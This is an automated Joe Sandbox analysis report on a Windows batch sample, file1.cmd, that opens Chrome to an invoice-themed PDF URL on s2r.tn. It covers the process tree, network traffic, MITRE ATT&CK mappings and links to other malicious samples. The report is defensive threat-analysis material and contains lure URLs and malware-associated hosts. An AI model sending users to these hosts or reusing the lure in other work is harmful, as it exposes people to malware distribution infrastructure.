Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file1.cmd

Overview

General Information

Sample name:file1.cmd
Analysis ID:1446775
MD5:79d0443c1e16cb595cbc94865d092fce
SHA1:87aea3eb544884d6763f6b8cda96869251f6d911
SHA256:27597b1219e3acecb7cb70f162f8cf2d28fba9238355f90f95e230365a8835d5
Tags:cmd
Infos:

Detection

Score:3
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 7620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1952,i,13483178300824636873,598200039164626055,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://s2r.tn/cgi/INVOICERVSHA.pdfHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49721 version: TLS 1.0
Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 70.38.21.234 70.38.21.234
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49721 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: global trafficHTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s2r.tn/cgi/INVOICERVSHA.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Uu+pS29dvbTrwRR&MD=+DkuFvsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Uu+pS29dvbTrwRR&MD=+DkuFvsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: s2r.tn
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:01:08 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:01:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:01:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: file1.cmdString found in binary or memory: https://s2r.tn/cgi/INVOICERVSHA.pdf
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: classification engineClassification label: clean3.winCMD@17/10@4/4
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file1.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1952,i,13483178300824636873,598200039164626055,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdfJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1952,i,13483178300824636873,598200039164626055,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: Google Drive.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdfJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
11
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1446775 Sample: file1.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 3 6 cmd.exe 13 2->6         started        process3 8 chrome.exe 14 6->8         started        11 conhost.exe 6->11         started        dnsIp4 16 192.168.2.9, 138, 443, 49704 unknown unknown 8->16 18 239.255.255.250 unknown Reserved 8->18 13 chrome.exe 8->13         started        process5 dnsIp6 20 s2r.tn 70.38.21.234, 443, 49709, 49712 IWEB-ASCA Canada 13->20 22 www.google.com 142.250.181.228, 443, 49716, 49724 GOOGLEUS United States 13->22

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file1.cmd0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s2r.tn/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s2r.tn
70.38.21.234
truefalse
    unknown
    www.google.com
    142.250.181.228
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://s2r.tn/cgi/INVOICERVSHA.pdffalse
        unknown
        https://s2r.tn/favicon.icofalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        70.38.21.234
        s2r.tnCanada
        32613IWEB-ASCAfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        142.250.181.228
        www.google.comUnited States
        15169GOOGLEUSfalse
        IP
        192.168.2.9
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446775
        Start date and time:2024-05-23 21:00:18 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 7s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:22
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:file1.cmd
        Detection:CLEAN
        Classification:clean3.winCMD@17/10@4/4
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .cmd
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 2.16.100.177, 88.221.110.91, 2.16.100.168, 88.221.110.112, 88.221.110.106, 2.16.100.138, 2.16.100.169, 142.250.185.163, 142.250.186.110, 142.251.168.84, 34.104.35.123, 192.229.221.95, 142.250.185.131
        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: file1.cmd
        No simulations
        InputOutput
        URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct
        {
        "loginform": false,
        "reasons": [
        "The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.",
        "It is a 404 error message, which means the page was not found and there is no login form on this page."
        ]
        }
        Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDument to handle the request. 
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        70.38.21.234file py p.batGet hashmaliciousUnknownBrowse
          file py portable.batGet hashmaliciousUnknownBrowse
            fileEEE.batGet hashmaliciousUnknownBrowse
              https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##Get hashmaliciousUnknownBrowse
                  upload.vbsGet hashmaliciousVenomRATBrowse
                    update.vbsGet hashmaliciousXWormBrowse
                      windows.vbsGet hashmaliciousXWormBrowse
                        file.batGet hashmaliciousUnknownBrowse
                          file.vbsGet hashmaliciousUnknownBrowse
                            239.255.255.250http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                              https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recordingGet hashmaliciousUnknownBrowse
                                https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                  b23c466-Payment Reciept May 22 2024.htmlGet hashmaliciousUnknownBrowse
                                    https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                      https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                        https://www.flipsnack.com/C65D7DCC5A8/sw-bruce-limited/full-view.htmlGet hashmaliciousUnknownBrowse
                                          https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                            https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                              http://all4promos.comGet hashmaliciousUnknownBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                s2r.tnfile py p.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py portable.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                fileEEE.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                upload.vbsGet hashmaliciousVenomRATBrowse
                                                • 70.38.21.234
                                                update.vbsGet hashmaliciousXWormBrowse
                                                • 70.38.21.234
                                                windows.vbsGet hashmaliciousXWormBrowse
                                                • 70.38.21.234
                                                file.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file.vbsGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                IWEB-ASCAfile py p.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py portable.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                fileEEE.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                IUzBqUNYMK.elfGet hashmaliciousUnknownBrowse
                                                • 174.142.183.68
                                                https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
